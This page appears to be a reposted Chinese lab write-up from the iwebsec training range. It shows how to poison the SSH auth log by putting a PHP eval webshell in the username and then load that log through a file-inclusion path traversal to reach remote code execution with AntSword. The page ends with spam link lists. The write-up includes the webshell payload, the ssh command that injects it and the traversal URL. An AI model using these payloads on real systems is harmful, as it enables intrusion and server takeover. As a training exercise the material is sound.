当前位置: 首页 > wzjs >正文

购物网站建设市场调查论文python网站开发基础

购物网站建设市场调查论文,python网站开发基础,公司名字大全简单好听,如何做购物网站目录 日志包含 1.构造恶意ssh登录命令 2.配置ssh日志开启 (1)配置sshd (2)配置rsyslog (3)重启服务 3.写入webshell木马 4.获取php信息渗透 5.蚁剑连接 日志包含 1.构造恶意ssh登录命令 ssh服务…

目录

日志包含

1.构造恶意ssh登录命令

2.配置ssh日志开启

(1)配置sshd

(2)配置rsyslog

(3)重启服务

3.写入webshell木马

4.获取php信息渗透

5.蚁剑连接


日志包含

1.构造恶意ssh登录命令

ssh服务如果开启了日志记录功能,那么在进行ssh连接时会将登录的日志记录到ssh日志文件内,这个文件的默认路径是/var/log/auth.log。那么可以通过将连接用户名设置为恶意代码,用命令连接服务器iwebsec的服务器,这样就可以将恶意代码写入到日志文件中。

用户名设置为为如下一句话木马脚本,参数为ljn

"<?php @eval(\$POST[ljn];?>"

2.配置ssh日志开启

(1)配置sshd

文件地址为/etc/ssh/sshd_config

SyslogFacility AUTHPRIV
LogLevel INFO

(2)配置rsyslog

ubuntu系统中文件地址为/etc/rsyslog.conf

# The authpriv file has restricted access.
authpriv.*                                              /var/log/auth.log

(3)重启服务

配置完毕后务必要记住重启服务,否则修改不生效

service sshd restart
service rsyslog restart

重启后效果如下

为了避免之前/var/log/auth.log中内容对渗透造成影响,故而将此文件先清空,如下所示:

3.写入webshell木马

此实验只是为了验证这个漏洞的存在,故而在iwebsec靶场的容器内执行,如下所示通过用户名向日志写入一句话马,参数为ljn,命令如下所示

ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1

执行完整交互如下所示:

[root@bc23a49cb37c /]# ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

 查看/var/log/auth.log 文件,发现已经将恶意的一句话木马通过登录用户写入到了ssh登录日志中,如下所示

[root@bc23a49cb37c /]# cat /var/log/auth.log 
Nov 28 07:07:07 bc23a49cb37c sshd[852]: Invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1
Nov 28 07:07:07 bc23a49cb37c sshd[853]: input_userauth_request: invalid user <?php @eval($_POST[ljn]);?>
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed none for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[853]: Connection closed by 127.0.0.1

这里如果没有生成日志的话,建议重启一下sshd服务与rsyslog服务再次重试

service rsyslog restart
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]

4.获取php信息渗透

ssh登录的日志名为/var/log/auth.log

于是构造日志访问路径 filename=../../../../var/log/auth.log

利用文件包含第01关卡进行渗透

http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.loghttp://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log渗透如下所示

5.蚁剑连接

添加url和密码,分别为http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log和ljn,如下所示

进入文件管理模块

如上所示,渗透成功


文章转载自:

http://QUmLn7Cd.bnqcm.cn
http://4qXpIU7R.bnqcm.cn
http://S2rLwbQj.bnqcm.cn
http://UmdsBJG5.bnqcm.cn
http://ykq66qvc.bnqcm.cn
http://7uMbgCpJ.bnqcm.cn
http://YQrKD7ln.bnqcm.cn
http://ySx4T7Pw.bnqcm.cn
http://3t5BtWfA.bnqcm.cn
http://H4nSr9Ya.bnqcm.cn
http://JYU71mMc.bnqcm.cn
http://FKD7rjM3.bnqcm.cn
http://wFXVHdIe.bnqcm.cn
http://3vamWyzj.bnqcm.cn
http://jC8RVrWm.bnqcm.cn
http://aq4VjlX7.bnqcm.cn
http://zsUMow6L.bnqcm.cn
http://v466e9N8.bnqcm.cn
http://q6qV7cDn.bnqcm.cn
http://RQ56z5z0.bnqcm.cn
http://CUGmnK5T.bnqcm.cn
http://mDQQuyav.bnqcm.cn
http://DMsqdwUH.bnqcm.cn
http://XbBsHX9O.bnqcm.cn
http://b0r0tRmz.bnqcm.cn
http://BzOeZJOq.bnqcm.cn
http://OpF3V7RG.bnqcm.cn
http://UcwcE3AR.bnqcm.cn
http://U43CyHrD.bnqcm.cn
http://7wxyuW6V.bnqcm.cn
http://www.dtcms.com/wzjs/698455.html

相关文章:

  • 兼职做问卷调查的网站好如何给公司取一个好名字
  • 山东平台网站建设企业问卷调查网站哪个好
  • 用源代码做网站wordpress编辑器功能增强
  • 自主网站制作html网站开发软件
  • 泉州洛江住房和城乡建设局网站企业网站建设文案案例
  • 企业网站建设 推广帮忙网页设计师
  • 厦门网站建设中心注册岩土工程师
  • 百度移动seo首选帝搜软件如何做好seo
  • 永康高端网站建设多少钱可以做网站
  • 简单个人网站源码网络seo
  • 网站开发在哪个科目核算佛山商城网站建设
  • 全球军情动态济南seo网站推广公司
  • 网站建设与管理的认识软件详细设计文档模板
  • 众包网站开发电商是做什么行业的
  • 唯品会网站建设数据安全分析锤子手机网站模板
  • 惠州建设网站公司天津招投标 天津建设工程信息网
  • 网站建设怎么样做账企业展厅策划设计公司有哪些
  • 上海做网站的公中国机械加工网18易0下6拉en
  • ip查询网站备案查询系统信息手机网站模板下载安装
  • 母婴网站源码dede网络营销公司做得比较好的
  • 小学生做网站步骤为什么网络经营者要有自己的网站
  • 从零开始学ui设计seo优化软件哪个好
  • 网站后台可视化编辑wordpress角色
  • 红酒网站源码网站三元素怎么做
  • 全球搜索网站排名网站多语言包
  • 仿京东电商的网站开发报价做局域网网站
  • 校园网站建设建议视频网站怎么建设
  • 个人建网站需要多少钱盐城优化办
  • 网上做翻译兼职网站制作网站赚钱吗
  • 自己怎么注册一个网站在线文字编辑器